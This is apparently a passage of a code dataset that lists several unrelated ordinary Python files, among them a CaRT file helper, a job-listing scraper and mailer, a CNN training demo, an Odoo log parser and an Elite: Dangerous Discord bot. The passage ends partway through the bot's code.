content stringlengths 5 1.05M |
|---|
import os
import tempfile
from cart import pack_stream, unpack_stream, is_cart
from assemblyline.common import identify
# noinspection PyBroadException
# noinspection PyBroadException
def decode_file(original_path, fileinfo):
    """Unpack a CaRT-encoded file if *original_path* is a cart.

    Returns a tuple ``(extracted_path, fileinfo, hdr)``:
    - extracted_path: path of the unpacked temp file, or None when the
      input was not a (valid) cart;
    - fileinfo: refreshed for the unpacked content on success, otherwise
      the caller's dict (marked 'corrupted/cart' on unpack failure);
    - hdr: the cart header metadata, {} when unavailable.
    """
    extracted_path = None
    hdr = {}
    with open(original_path, 'rb') as original_file:
        # The first 256 bytes are enough to recognize the cart magic.
        if is_cart(original_file.read(256)):
            original_file.seek(0)

            extracted_fd, extracted_path = tempfile.mkstemp()
            extracted_file = os.fdopen(extracted_fd, 'wb')

            cart_extracted = False
            try:
                hdr, _ = unpack_stream(original_file, extracted_file)
                cart_extracted = True
            except Exception:
                # BUG FIX: the original left the partially-written temp
                # file on disk; close and remove it instead of leaking it.
                extracted_file.close()
                extracted_file = None
                try:
                    os.unlink(extracted_path)
                except OSError:
                    pass
                extracted_path = None
                hdr = {}
                fileinfo['type'] = 'corrupted/cart'
            finally:
                if extracted_file is not None:
                    extracted_file.close()

            if cart_extracted:
                fileinfo = identify.fileinfo(extracted_path)

    return extracted_path, fileinfo, hdr
# noinspection PyUnusedLocal
# noinspection PyUnusedLocal
def encode_file(input_path, name, metadata=None):
    """Pack *input_path* into a new CaRT temp file.

    Returns ``(output_path, output_name)`` for the packed file, or
    ``(input_path, name)`` unchanged when the input is already a cart.
    """
    if metadata is None:
        metadata = {}

    # BUG FIX: the original discarded the mkstemp file descriptor,
    # leaking it; close it and reopen the path normally below.
    output_fd, output_path = tempfile.mkstemp()
    os.close(output_fd)

    with open(input_path, 'rb') as ih:
        # 64 bytes suffice for the cart magic check.
        if is_cart(ih.read(64)):
            # BUG FIX: already a cart — remove the now-unneeded temp file
            # (the original left an empty temp file behind) and pass through.
            os.unlink(output_path)
            return input_path, name
        ih.seek(0)
        metadata.update({'name': name})
        with open(output_path, 'wb') as oh:
            pack_stream(ih, oh, metadata)
    return output_path, f"{name}.cart"
|
"""
Data type for 'features' that can be used in machine learning analyses as
independent or dependent variables. feature_variables contain metadata
attributes specific to the 'feature_collection' they are part of so that the
features themselves can be queried when constructing a data set to analyze from
the database.
"""
from nest_py.core.data_types.tablelike_schema import TablelikeSchema
from nest_py.core.data_types.tablelike_entry import TablelikeEntry
COLLECTION_NAME = 'feature_variables'
def generate_schema():
    """Build the TablelikeSchema describing the feature_variables collection."""
    schema = TablelikeSchema(COLLECTION_NAME)

    # The feature_collection this variable holds metadata attributes for.
    schema.add_foreignid_attribute('feature_collection_id')

    # Name of the feature within its collection. Not enforced unique
    # (even within the collection), though uniqueness is advisable.
    schema.add_categoric_attribute('local_name')

    # Feature analysis can only automatically handle these column types.
    schema.add_categoric_attribute('feature_type',
        valid_values=['categoric', 'numeric'])

    # The wix run that loaded this data into the db. TODO: maybe the
    # variable shouldn't be inherently tied to the run, only the realz —
    # a variable might be reused.
    schema.add_foreignid_attribute('wix_run_id')

    # All feature_variables of a given feature_collection share the same
    # nested metadata schema here, so their entries carry the same keys and
    # are queryable against each other. TODO: entries are complete tles —
    # should there be a tle type? For now the payload is produced with
    # TablelikeSchema.object_to_flat_jdata(tle).
    schema.add_json_attribute('metadata_attributes')

    return schema
|
from .LHSNode import LHSNode
class DereferenceNode(LHSNode):
    """LHS node representing a dereference of an expression."""

    def __init__(self, expr):
        self._expr = expr

    def orig_type(self):
        # The dereferenced value has the base type of the expression's type.
        return self._expr.type().base_type()

    def expr(self):
        """Return the dereferenced expression."""
        return self._expr

    def set_expr(self, expr):
        """Replace the dereferenced expression."""
        self._expr = expr

    def location(self):
        # Source location is that of the underlying expression.
        return self._expr.location()

    def _dump(self, dumper):
        # BUG FIX: the original tested `self.type != None`, which compares
        # the *bound method object* (always truthy) instead of calling it;
        # the intent is clearly to skip the member when type() is None.
        if self.type() is not None:
            dumper.print_member("type", self.type())
        dumper.print_member("expr", self._expr)

    def accept(self, visitor):
        return visitor.visit(self)
import imtreat
# Load the test image; second argument 1 is presumably a color/mode flag — TODO confirm.
img = imtreat.imageManagerClass.openImageFunction("../images/lena.png", 1)
# Run smile detection on the loaded image.
img = imtreat.bodyPartsDetectionClass.smileDetectionFunction(img)
# Save the processed result as image_1.png into the target directory.
imtreat.imageManagerClass.saveImageFunction("/Téléchargements/", "image_1", ".png", img)
|
import os
import smtplib
import spacy
import urllib3
from bs4 import BeautifulSoup
from dotenv import load_dotenv
from email.message import EmailMessage
from pyshorteners import Shortener
from sklearn.neighbors import NearestNeighbors
from tqdm import tqdm
# Load environment variables.
# Docker
# env_path = '/usr/src/.env'
# load_dotenv(dotenv_path=env_path, verbose=True)
# Local
load_dotenv()
# Mail credentials and the URL-shortener API key come from the .env file;
# any missing key yields None here and fails later at login/shorten time.
PASSWORD = os.getenv('PASSWORD')
USER_NAME = os.getenv('USER_NAME')
EMAIL_ADDRESS = os.getenv('EMAIL_ADDRESS')
API_KEY = os.getenv('API_KEY')
class JobFinder(object):
    """Get Indeed.com job listings that match closest with your provided document.
    Use BeautifulSoup4 to scrape Indeed.com for job listings and descriptions.
    Use the Spacy NLP library to vectorize each listing and your provided document.
    Then, use KNN to find listings most relevant to your provided document.
    Get the results right in your email inbox!
    User supplies:
    - The number of indeed.com pages to search.
    - The number of search results to return.
    - The email address to send results to.
    - The file name of your provided document.
    - The city you want to work in.
    - The state that city is in.
    - A search term for the kind of job you're looking for (i.e. Data Scientist).
    """

    def __init__(self):
        self.pages = self.num_user_input('\nEnter number of pages to search:\n')  # Number of indeed pages to search.
        self.num_jobs = self.num_user_input('\nEnter max job listings to receive:\n') * 2  # Buffer for duplicates.
        self.resume = self.load_resume()
        self.email = self.user_input('\nEnter email:\n')
        print('\nYou may leave any of the following prompts blank to broaden your search.')
        self.city = self.user_input('\nEnter desired city:\n').strip().title()
        self.state = self.user_input('\nEnter state abbreviation:\n').strip().upper()
        self.terms = self.user_input('\nEnter desired job title:\n').strip().lower()
        print('\nLoading NLP packages...')
        self.nlp = spacy.load('en_core_web_sm')
        self.nn = NearestNeighbors(n_neighbors=self.num_jobs,
                                   algorithm='ball_tree')
        self.shortener = Shortener(api_key=API_KEY)
        self.jobs = []
        self.base_email = EMAIL_ADDRESS
        self.vectors = None
        self.indeed_scraper = IndeedScraper(self.pages, self.num_jobs, self.city, self.state, self.terms)
        self.descriptions = self.indeed_scraper.get_descriptions()
        self.main()

    def main(self) -> None:
        """Calls all methods needed to complete program."""
        self.vectors = self.get_description_vectors()
        self.get_best_jobs()
        self.remove_duplicates()
        self.email_jobs()

    def load_resume(self) -> str:
        """Load resume text from disc, re-prompting until a readable .txt is found."""
        while True:
            path = self.user_input('\nEnter document file name:\n')
            # BUG FIX: the original checked `path[-3:] != "txt"`, which
            # accepts names like "mytxt" or a bare "txt" that are not
            # actually .txt files.
            if not path.endswith('.txt'):
                print(f'\n{"-" * 20}')
                print('File name must end in ".txt"')
                print(f'{"-" * 20}')
                continue
            try:
                with open(path, 'r') as f:
                    print('\nLoading document...')
                    resume = f.read().strip('\n')
                break
            except FileNotFoundError:
                # Help the user find their file (Docker users often forget
                # to copy it into the container).
                print(f'\n{"-" * 20}')
                print(f"Can't find {path}")
                directory = os.path.curdir
                files = [file for file in os.listdir(directory) if os.path.isfile(os.path.join(directory, file))]
                print(f'Files I can see: \n\n{", ".join(files)}\n')
                print('Did you copy your file to the Docker container?')
                print('See instructions at: https://github.com/llpk79/Job-finder/packages/111889')
                print(f'{"-" * 20}')
        return resume

    @staticmethod
    def user_input(prompt: str) -> str:
        """Prompts user with <prompt> and returns string input."""
        return input(prompt)

    @staticmethod
    def num_user_input(prompt: str) -> int:
        """Prompts user with <prompt> and returns integer input."""
        while True:
            try:
                num = int(input(prompt))
                return num
            except ValueError:
                print('\nPlease enter a number.\n')
                continue

    def get_description_vectors(self) -> list:
        """Get Spacy vectors for each long form job description."""
        print('\nGetting description vectors...\n')
        return [self.nlp(doc).vector for _, doc, _ in tqdm(self.descriptions)]

    def get_best_jobs(self) -> None:
        """Vectorize resume and fit a nearest neighbors classifier to find desired number of jobs."""
        print(f'\nFinding best {self.num_jobs // 2} job matches...\n')
        self.nn.fit(self.vectors)
        neighbors = list(self.nn.kneighbors([self.nlp(self.resume).vector], self.num_jobs, return_distance=False)[0])
        for neighbor in neighbors:
            self.jobs.append(self.descriptions[neighbor])

    def remove_duplicates(self) -> None:
        """Use Spacy's similarity function to weed out duplicate job descriptions."""
        # BUG FIX: guard against an empty job list; the original indexed
        # self.jobs[0] unconditionally and raised IndexError.
        if not self.jobs:
            return
        final_jobs = [self.jobs[0]]
        for job in tqdm(self.jobs[1:]):
            doc1 = self.nlp(job[1])
            # Compare the similarity of <job> to each doc in <final_jobs>.
            # If <job> matches any of <final_jobs> reject <job>.
            if all([doc1.similarity(self.nlp(doc[1])) < .99 for doc in final_jobs]):
                final_jobs.append(job)
            # Don't include more jobs than were asked for.
            if len(final_jobs) == self.num_jobs // 2:
                break
        self.jobs = final_jobs.copy()

    def email_jobs(self) -> None:
        """Send list of jobs to user."""
        print('\nEmailing jobs...\n')
        msg = self.build_message()
        server = self.initialize_server()
        self.send_and_deactivate(server, msg)

    def build_message(self) -> EmailMessage:
        """Create EmailMessage instance."""
        msg = EmailMessage()
        msg['subject'] = 'New jobs!!'
        msg['from'] = self.base_email
        msg['to'] = self.email
        div = '\n' + '*-' * 20 + '\n'
        msg.set_content(f'{div}'.join([job[2] + '\n\n' + self.shortener.bitly.short(job[0]) + '\n\n' + job[1] + '\n\n'
                                       for job in self.jobs]))  # job == (url, description, title)
        return msg

    @staticmethod
    def initialize_server() -> smtplib.SMTP:
        """Start a Gmail smtp server."""
        server = smtplib.SMTP('smtp.gmail.com', 587)
        # server.set_debuglevel(1)
        server.starttls()
        server.login(USER_NAME, PASSWORD)
        return server

    @staticmethod
    def send_and_deactivate(server: smtplib.SMTP, msg: EmailMessage) -> None:
        """Send <msg> and deactivate <server>. Print confirmation message."""
        server.send_message(msg)
        server.quit()
        print("You've got mail!!")
class IndeedScraper(object):
    """Scrape Indeed.com search pages and follow links to long-form job descriptions."""

    def __init__(self, pages: int, num_jobs: int, city: str, state: str, terms: str) -> None:
        self.pages = pages
        self.num_jobs = num_jobs
        self.city = city
        self.state = state
        self.terms = terms
        self.url = self.build_url()
        self.http = urllib3.PoolManager()
        self.descriptions = None

    def build_url(self) -> str:
        """Builds search url from user input."""
        url = f'http://www.indeed.com/jobs?q=' \
              f"{'%20'.join(self.terms.split())}&l={'%20'.join(self.city.split())},%20{self.state}"
        print(f'\nIndeed search URL: {url}')
        return url

    @staticmethod
    def find_long_descriptions(soup) -> list:
        """Create list of urls for long form job descriptions."""
        urls = []
        for div in soup.find_all(name='div',
                                 attrs={'class': 'row'}):
            for a in div.find_all(name='a',
                                  attrs={'class': 'jobtitle turnstileLink'}):
                urls.append(a['href'])
        return urls

    def get_next_pages(self) -> list:
        """Create a list of top level pages to search."""
        # Indeed paginates with &start=10, 20, ... — page 0 is the bare URL.
        return [self.url] + [self.url + f'&start={x}0' for x in range(1, self.pages)]

    def get_descriptions(self) -> list:
        """Create a list of tuples containing job url, job description title,
        and long form job descriptions.
        """
        print('\nGetting Indeed job descriptions...\n')
        descriptions = []
        # Get and parse each top level page.
        for base_url in tqdm(self.get_next_pages()):
            request = self.http.request('GET',
                                        base_url)
            base_soup = BeautifulSoup(request.data, 'html.parser')
            # Follow links to each job description on the page.
            for url in self.find_long_descriptions(base_soup):
                the_url = "http://www.indeed.com/" + url
                req = self.http.request('GET',
                                        the_url,
                                        headers={'User-Agent': 'opera'},
                                        retries=urllib3.Retry(connect=500,
                                                              read=2,
                                                              redirect=50))
                # Parse out title and text from each description page and put it in the descriptions list.
                soup = BeautifulSoup(req.data, 'html.parser')
                title = soup.find(name='h3',
                                  attrs={'class': 'icl-u-xs-mb--xs icl-u-xs-mt--none jobsearch-JobInfoHeader-title'})
                description = soup.find(name='div',
                                        attrs={'id': 'jobDescriptionText'})
                if description:
                    # BUG FIX: the original called title.text unconditionally
                    # and crashed with AttributeError whenever the title
                    # element was missing from the page.
                    descriptions.append((the_url, description.text, title.text if title else ''))
        return descriptions
if __name__ == "__main__":
    # JobFinder drives the whole interactive run from its constructor.
    scraper = JobFinder()
|
#./flexflow_python $FF_HOME/bootcamp_demo/keras_cnn_cifar10.py -ll:py 1 -ll:gpu 1 -ll:fsize 2048 -ll:zsize 12192
# from keras.models import Model, Sequential
# from keras.layers import Input, Flatten, Dense, Activation, Conv2D, MaxPooling2D, Dropout
# from keras.optimizers import SGD
# from keras.datasets import cifar10
# from keras import losses
# from keras import metrics
from flexflow.keras.models import Model, Sequential
from flexflow.keras.layers import Input, Flatten, Dense, Activation, Conv2D, MaxPooling2D, Dropout
from flexflow.keras.optimizers import SGD
from flexflow.keras.datasets import cifar10
from flexflow.keras import losses
from flexflow.keras import metrics
import numpy as np
def top_level_task():
    """Train a small CNN on CIFAR-10 via the FlexFlow Keras frontend."""
    num_classes = 10
    num_samples = 10000

    # Only the training split is used; the test split is discarded.
    (x_train, y_train), _ = cifar10.load_data(num_samples)
    x_train = x_train.astype('float32')
    x_train /= 255
    y_train = y_train.astype('int32')
    print("shape: ", x_train.shape[1:])

    # Two conv blocks followed by a dense classifier head.
    model = Sequential()
    for layer in (
            Conv2D(filters=32, input_shape=(3, 32, 32), kernel_size=(3, 3), strides=(1, 1), padding="valid", activation="relu"),
            Conv2D(filters=32, kernel_size=(3, 3), strides=(1, 1), padding="valid", activation="relu"),
            MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding="valid"),
            Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1), padding="valid", activation="relu"),
            Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1), padding="valid"),
            Activation("relu"),
            MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding="valid"),
            Flatten(),
            Dense(512),
            Activation("relu"),
            Dropout(0.5),
            Dense(num_classes),
            Activation("softmax")):
        model.add(layer)

    opt = SGD(learning_rate=0.01)
    model.compile(optimizer=opt, loss='sparse_categorical_crossentropy', metrics=['accuracy', 'sparse_categorical_crossentropy'])
    print(model.summary())
    model.fit(x_train, y_train, batch_size=64, epochs=4)
if __name__ == "__main__":
    # Announce the demo and run the training task.
    print("Functional API, cifar10 cnn")
    top_level_task()
import re
from typing import Iterable, Iterator, MutableMapping
from urllib.parse import urlparse
# from tartley/colorama
# Strips (optionally SOH/STX-wrapped) ANSI CSI escape sequences before parsing.
ANSI_CSI_RE = re.compile("\001?\033\\[((?:\\d|;)*)([a-zA-Z])\002?")

# Fixed prefix of a standard Odoo log line:
# "<timestamp> <pid> <level> <db> <logger>: <message>"
ODOO_LOG_RE = re.compile(
    r"^"
    r"(?P<asctime>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) "
    r"(?P<pid>\d+) "
    r"(?P<levelname>\w+) "
    r"(?P<dbname>\S+) "
    r"(?P<logger>\S+): "
    r"(?P<message>.*)"
    r"$"
)


def parse_stream(
    stream: Iterable[str], include_raw: bool = False
) -> Iterator[MutableMapping[str, str]]:
    """Parse a stream of Odoo log lines and return an iterator of log records.
    Log records have the following keys:
    - asctime: timestamp
    - pid: process or thread id
    - dbname: database name
    - logger: python logger name
    - levelname: python logging level name
    - message: the rest of the line
    """
    current = None
    for raw_line in stream:
        clean = ANSI_CSI_RE.sub("", raw_line)
        match = ODOO_LOG_RE.match(clean)
        if match:
            # Start of a new record: flush the one in progress first.
            if current:
                yield current
            current = match.groupdict()
            if include_raw:
                current["raw"] = clean
        elif current:
            # Irregular line mid-file: treat as a continuation of the open
            # record (typically a multi-line stack trace).
            current["message"] += "\n" + clean.strip()
            if include_raw:
                current["raw"] += clean
        else:
            # Irregular lines before the first regular one: yield standalone.
            orphan = {"message": clean.strip()}
            if include_raw:
                orphan["raw"] = clean
            yield orphan
    if current:
        yield current
# Matches the werkzeug access-log message Odoo emits per HTTP request,
# including the optional trailing perf triple "<sql_count> <sql_time> <other_time>".
ODOO_WERKZEUG_RE = re.compile(
    r"^(?P<remote_addr>\S+)"
    r" .+? .+? \[.*?\]"
    r" \"(?P<request_method>\S+) (?P<request_uri>\S+) .*?\""
    r" (?P<status>\S+) \S+"
    r"( (?P<perf_info>"
    r"(?P<sql_count>\d+) "
    r"(?P<sql_time>\d*\.\d+) "
    r"(?P<other_time>\d*\.\d+)"
    r"))?"
    r".*$"
)


def _convert_field(d, k, converter):
    """Convert d[k] in place with *converter*; drop the key on any failure."""
    if k not in d:
        return
    try:
        d[k] = converter(d[k])
    except Exception:
        del d[k]


def enrich_werkzeug(
    records: Iterable[MutableMapping[str, str]]
) -> Iterator[MutableMapping[str, str]]:
    """Enrich werkzeug (http requests) log records"""
    for record in records:
        if record.get("logger") == "werkzeug":
            match = ODOO_WERKZEUG_RE.match(record.get("message", ""))
            if match:
                # Copy every captured group that actually matched.
                for key, value in match.groupdict().items():
                    if value is not None:
                        record[key] = value
                record["request_path"] = urlparse(record["request_uri"]).path
                _convert_field(record, "sql_count", int)
                _convert_field(record, "sql_time", float)
                _convert_field(record, "other_time", float)
                if "sql_time" in record and "other_time" in record:
                    record["total_time"] = record["sql_time"] + record["other_time"]
        yield record


def enrich(
    records: Iterable[MutableMapping[str, str]]
) -> Iterator[MutableMapping[str, str]]:
    """Apply all enrichers to *records* (currently werkzeug only)."""
    return enrich_werkzeug(records)
|
import bpy
from bpy.props import *
from bpy.types import Node, NodeSocket
from arm.logicnode.arm_nodes import *
class CanvasSetRotationNode(Node, ArmLogicTreeNode):
    '''Set canvas element rotation'''
    bl_idname = 'LNCanvasSetRotationNode'
    bl_label = 'Canvas Set Rotation'
    bl_icon = 'QUESTION'

    def init(self, context):
        # Inputs: action trigger, target element name, rotation in radians.
        for socket_type, socket_name in (('ArmNodeSocketAction', 'In'),
                                         ('NodeSocketString', 'Element'),
                                         ('NodeSocketFloat', 'Rad')):
            self.inputs.new(socket_type, socket_name)
        # Single pass-through action output.
        self.outputs.new('ArmNodeSocketAction', 'Out')


add_node(CanvasSetRotationNode, category='Canvas')
|
#!/usr/bin/env python
import glob
import logging
import os
import sys

import mne
import numpy as np
import pyedflib
import wfdb
from mne.io import read_raw_edf

from config import *
from fourier import fourier
# Channel-type mapping handed to MNE so non-EEG EDF channels are typed correctly.
mapping = {'EOG horizontal': 'eog',
'Resp oro-nasal': 'misc',
'EMG submental': 'misc',
'Temp rectal': 'misc',
'Event marker': 'misc'}
def edfplot(psg_name, ann_name):
    """Load a Sleep-EDF PSG/annotation pair, plot the raw signal and the
    sleep-stage events.

    NOTE(review): `plt` is never imported in this module — it presumably
    arrives via the `from config import *` star import; confirm.
    """
    raw_train = mne.io.read_raw_edf(psg_name)
    annot_train = mne.read_annotations(ann_name)
    raw_train.set_annotations(annot_train, emit_warning=False)
    raw_train.set_channel_types(mapping)

    # plot some data
    raw_train.plot(duration=60, scalings='auto')

    annotation_desc_2_event_id = {'Sleep stage W': 1,
                                  'Sleep stage 1': 2,
                                  'Sleep stage 2': 3,
                                  'Sleep stage 3': 4,
                                  'Sleep stage 4': 4,
                                  'Sleep stage R': 5}

    # keep last 30-min wake events before sleep and first 30-min wake events after
    # sleep and redefine annotations on raw data
    annot_train.crop(annot_train[1]['onset'] - 30 * 60,
                     annot_train[-2]['onset'] + 30 * 60)
    raw_train.set_annotations(annot_train, emit_warning=False)

    events_train, _ = mne.events_from_annotations(
        raw_train, event_id=annotation_desc_2_event_id, chunk_duration=30.)

    # create a new event_id that unifies stages 3 and 4
    event_id = {'Sleep stage W': 1,
                'Sleep stage 1': 2,
                'Sleep stage 2': 3,
                'Sleep stage 3/4': 4,
                'Sleep stage R': 5}

    # plot events
    fig = mne.viz.plot_events(events_train, event_id=event_id,
                              sfreq=raw_train.info['sfreq'],
                              first_samp=events_train[0, 0])

    # keep the color-code for further plotting
    stage_colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
def ftt(data):
    """Plot *data* before and after applying the Fourier transform.

    NOTE(review): relies on `plt` coming from the `config` star import.
    """
    def _plot(series, title):
        # Shared figure boilerplate for both plots.
        plt.plot(series)
        plt.title(title)
        plt.ylabel('sleep')
        plt.xlabel('time')

    ### BEFORE FOURIER
    _plot(data, 'Before Fourier Transformation')
    plt.show()

    ### AFTER FOURIER
    _plot(fourier(data), 'After Fourier Transformation')
    plt.legend(['before', 'after'], loc='upper right')
    plt.show()
def main(args=sys.argv[1:]):
    """Entry point.

    NOTE(review): the original body is not visible in this chunk — the only
    statement following the `def` was the (broken) __main__ guard, which is
    moved to module level below. Confirm the intended body.
    """
    pass


# BUG FIX: the original guard was `if name == 'main'`, which raises
# NameError (`name` is undefined) and would never have matched anyway;
# the conventional `__name__ == '__main__'` check is clearly intended.
if __name__ == '__main__':
    main()
|
import discord
from discord.ext import commands
import random
import re
import traceback
import math
import elite
import elite_mapper
# Help text shown by the bot's default help command.
description = '''Elite:Dangerous connector bot.'''
# Unused placeholder; the real token is read from data/token.secret at startup.
token = ''
# Extracts the numeric ID from a discord mention such as "<@1234>".
uid_regex = re.compile(r'<.*?(\d+)>')
bot = commands.Bot(command_prefix='!ed ', description=description)
@bot.event
async def on_ready():
    # Announce who we logged in as, then warm up the elite data cache.
    for line in ('Logged in as', bot.user.name, bot.user.id, '------'):
        print(line)
    elite.load_data()
@bot.command()
async def locate(name: str):
    """Gets the location of a commander (alt for 'location')"""
    # NOTE: resolving the mention here is redundant (locate_handler resolves
    # it again) but preserved for identical behavior.
    name = get_uid(name)
    await bot.say(locate_handler(name))


@bot.command()
async def location(name: str):
    """Gets the location of a commander (alt for 'locate')"""
    await bot.say(locate_handler(name))
def locate_handler(name: str):
    """Resolve *name* (mention or CMDR name) and describe where they are."""
    cmdr = get_uid(name)
    system_name = elite.get_cmdr_system_name(cmdr)
    cmdr_name, _ = elite.get_cmdr(cmdr)
    # EDSM may report the literal string 'None' for unknown locations.
    if not system_name or system_name == 'None':
        return '{0} could not be located'.format(name)
    return '{0} is at {1}'.format(cmdr_name, system_name)
def get_uid(name):
    """Return the numeric ID inside a discord mention, or *name* unchanged."""
    match = uid_regex.search(name)
    return match.group(1) if match else name
@bot.command(pass_context=True)
async def register(ctx, cmdrName: str, key=None):
    """Links a discord username and a CMDR (and EDSM API key)"""
    user = str(ctx.message.author.id)
    elite.set_cmdr(user, cmdrName, key)
    parts = ['o7 Greetings CMDR {0}! I\'ve got you registered with "<@{1}>"=="{0}".'.format(cmdrName, user)]
    if key:
        # Nudge the user to remove the message containing their API key.
        parts.append(' I advise deleting your post so your API Key doesn\'t ~~get intercepted by Thargoids~~ persist in the chat logs.')
    await bot.say(''.join(parts))
@bot.command()
async def poi(poiName: str, poiLocation = None):
    """Displays or creates/updates a Point of Interest"""
    msg = 'Could not process command :('
    if poiLocation:
        if poiLocation in ('remove', 'delete'):
            # Deletion request.
            if elite.remove_POI(poiName):
                msg = 'Removed Point of Interest "{0}"'.format(poiName)
            else:
                msg = '"{0}" is not a known point of interest'.format(poiName)
        else:
            # Create/update request.
            created = elite.add_POI(poiName, poiLocation)
            if created:
                msg = 'Added Point of Interest "{0}" at {1} {2}'.format(created.name, created.system, created.coords)
            else:
                msg = 'Could not find system with name "{0}"'.format(poiLocation)
    else:
        # Lookup request.
        found = elite.get_POI(poiName)
        if found:
            msg = '{0} ({1}) is located at {2}'.format(found.name, found.system, found.coords)
        else:
            msg = '"{0}" is not a known point of interest'.format(poiName)
    await bot.say(msg)
@bot.command()
async def pois():
    """Lists all Points of Interest"""
    msg = 'Points of Interest:\n'
    # Sorted by key for a stable listing order.
    for _, point in sorted(elite.get_POIs().items()):
        msg += '{0}: {1}\n'.format(point.name, point.system)
    await bot.say(msg)
@bot.command()
async def distance(item1: str, item2: str):
    """Gets the distance between two items (CMDR, PoI, System)"""
    # Resolve possible discord mentions before the lookup.
    ly = elite.friendly_get_distance(get_uid(item1), get_uid(item2))
    await bot.say('{0} is {1} LY from {2}'.format(item2, round(ly, 2), item1))
@bot.command(pass_context=True)
async def info(ctx, system: str):
    """Gets detailed information on a system (alt for 'system')"""
    await bot.send_typing(ctx.message.channel)
    await bot.say(info_handler(system))


@bot.command(pass_context=True)
async def system(ctx, system: str):
    """Gets detailed information on a system (alt for 'info')"""
    await bot.send_typing(ctx.message.channel)
    await bot.say(info_handler(system))


def info_handler(system):
    # Thin wrapper kept so both command aliases share a single code path.
    return elite.get_system_info_for_display(system)
@bot.command(pass_context = True)
async def radius(ctx, system: str, radius: float, minRadius = 0.0):
    """Returns systems within a radius around a system"""
    await bot.send_typing(ctx.message.channel)
    coords = elite.friendly_get_coords(system)
    systems = elite.get_systems_in_radius(coords, radius, minRadius)
    if systems:
        msg = '{0} systems between {1} and {2} LY from {3}'.format(len(systems), minRadius, radius, system)
        if len(systems) > 0:
            msg += ':\n'
            limit = 50
            if len(systems) > limit:
                msg += '(closest {0} shown)\n'.format(limit)
            count = 0
            # `entry` rather than `sys`: the original shadowed the stdlib name.
            for entry in sorted(systems, key=lambda x: x['distance']):
                msg += '{0}: {1} LY\n'.format(entry['name'], entry['distance'])
                count += 1
                # BUG FIX: the original broke on `count > limit`, which let
                # limit + 1 systems through while promising "closest 50".
                if count >= limit:
                    break
        else:
            msg += '\n'
    else:
        msg = 'No systems in range'
    await bot.say(msg)
@bot.command(pass_context=True)
async def balance(ctx, name: str):
    '''Gets credit balance of cmdr name'''
    await bot.send_typing(ctx.message.channel)
    credits = elite.get_credits(get_uid(name))
    msg = '{0} '.format(name)
    # msgnum 100 is EDSM's "OK" status code.
    if credits and credits['msgnum'] == 100:
        msg += 'has {:,} credits.'.format(credits['credits'][0]['balance'])
    else:
        msg += 'could not be found'
    await bot.say(msg)
@bot.command(pass_context=True)
async def ranks(ctx, name: str):
    '''Gets all ranks of cmdr name'''
    await bot.send_typing(ctx.message.channel)
    cmdr = get_uid(name)
    ranks = elite.get_ranks(cmdr)
    msg = '__{0}__\n'.format(name)
    if ranks and ranks['msgnum'] == 100:
        # One line per rank category, with verbose rank and percent progress.
        for category in ('Combat', 'Trade', 'Explore', 'CQC', 'Federation', 'Empire'):
            msg += '{0} : {1} ({2}%)\n'.format(category, ranks['ranksVerbose'][category], ranks['progress'][category])
    else:
        msg = 'No ranks found for "{0}"'.format(name)
    await bot.say(msg)
@bot.command(pass_context=True)
async def materials(ctx, name: str):
    '''Gets all materials for the cmdr'''
    await bot.send_typing(ctx.message.channel)
    cmdr = get_uid(name)
    materials = elite.get_materials(cmdr)
    msg = '_{0} materials_\n'.format(name)
    if materials and materials['msgnum'] == 100:
        # Only list materials the cmdr actually holds.
        for mats in materials['materials']:
            if mats['qty'] > 0:
                msg += '{0} : {1}\n'.format(mats['name'], mats['qty'])
    else:
        msg = 'No materials found for "{0}"'.format(name)
    await bot.say(msg)
@bot.command(pass_context=True)
async def cargo(ctx, name: str):
    '''Gets all cargo for the cmdr'''
    await bot.send_typing(ctx.message.channel)
    cmdr = get_uid(name)
    cargo = elite.get_cargo(cmdr)
    msg = '_{0} cargo_\n'.format(name)
    cargoNum = 0
    if cargo and cargo['msgnum'] == 100:
        # Only list cargo the cmdr actually holds.
        for item in cargo['cargo']:
            if item['qty'] > 0:
                msg += '{0} : {1}\n'.format(item['name'], item['qty'])
                cargoNum += 1
    else:
        msg = 'No cargo found for "{0}"'.format(name)
        # -1 suppresses the empty-hold note below.
        cargoNum = -1
    if cargoNum == 0:
        msg += 'No cargo!'
    await bot.say(msg)
@bot.command(pass_context=True)
async def data(ctx, name: str):
    '''Gets all encoded data for the cmdr'''
    await bot.send_typing(ctx.message.channel)
    cmdr = get_uid(name)
    encodedData = elite.get_encoded_data(cmdr)
    msg = '_{0} encoded data_\n'.format(name)
    if encodedData and encodedData['msgnum'] == 100:
        # Only list entries the cmdr actually holds.
        for entry in encodedData['data']:
            if entry['qty'] > 0:
                msg += '{0} : {1}\n'.format(entry['name'], entry['qty'])
    else:
        msg = 'No encoded data found for "{0}"'.format(name)
    await bot.say(msg)
@bot.command(pass_context=True)
async def map(ctx):
    '''Returns a map of the requested items'''
    # BUG FIX / consistency: `bot.type()` is not part of the discord.py 0.16
    # API used everywhere else in this file; use send_typing like the other
    # commands do.
    await bot.send_typing(ctx.message.channel)
    elite_mapper.parse_and_plot(ctx.message.content)
    # elite_mapper always writes its figure to data/fig.png.
    with open('data/fig.png', 'rb') as f:
        await bot.upload(f)
@bot.command()
async def rate(name: str):
    '''Gets the jump rate, average jump distance, and ly per hour for a commander'''
    cmdr = get_uid(name)
    try:
        jump_rate = elite.get_jump_rate(cmdr)
        avg_dist = elite.get_average_jump_distance(cmdr)
        ly_per_hour = jump_rate * avg_dist
        msg = f'{name} jumps {jump_rate:0.2f} times per hour at an average jump distance of {avg_dist:0.2f} ly for a rate of {ly_per_hour:0.2f} ly per hour.'
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; the user still gets a friendly message.
        msg = f'Could not determine rate information for "{name}": {traceback.format_exc().splitlines()[-1]}'
    await bot.say(msg)
@bot.command()
async def target(system: str, name: str):
    '''Gets the distance and estimate of jumps and time required to travel to a target system'''
    cmdr = get_uid(name)
    try:
        _, known = elite.get_cmdr(cmdr)
        if not known:
            # BUG FIX: the original `return`ed this string, which discord.py
            # discards — the user never saw the error. Send it like every
            # other reply instead.
            await bot.say('Command requires target system and commander name!')
            return
        rate = elite.get_jump_rate(cmdr)
        avgDist = elite.get_average_jump_distance(cmdr)
        dist = elite.friendly_get_distance(cmdr, system)
